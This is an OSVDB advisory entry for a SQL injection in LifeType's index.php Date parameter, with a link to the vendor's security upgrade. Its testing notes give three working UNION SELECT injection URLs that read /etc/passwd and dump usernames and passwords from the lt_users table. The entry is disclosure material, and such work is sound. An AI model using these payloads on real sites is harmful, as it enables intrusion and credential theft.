LifeType index.php Date Variable SQL Injection

2006-07-05T00:00:08
ID OSVDB:28180
Type osvdb
Reporter OSVDB
Modified 2006-07-05T00:00:08

Description

Manual Testing Notes

http://[target]/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,load_file("/etc/passwd"),1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/&blogId=1'" http://[target]/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,password,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/&blogId=1'" http://[target]/index.php?op=Default&Date=200607\'%20UNION%20SELECT%201,user,1,1,1,1,1,1,1,1%20FROM%20lt_users%20WHERE%20id=\'1\'/*&blogId=1'"

References:

Vendor URL: http://www.lifetype.net/blog.php/lifetype_development_journal/2006/06/04/important_security_upgrade_lifetype_1.0.5_released Related OSVDB ID: 28181 Other Advisory URL: http://osvdb.org/ref/28/28180-lifetype.txt CVE-2006-3577 Bugtraq ID: 18835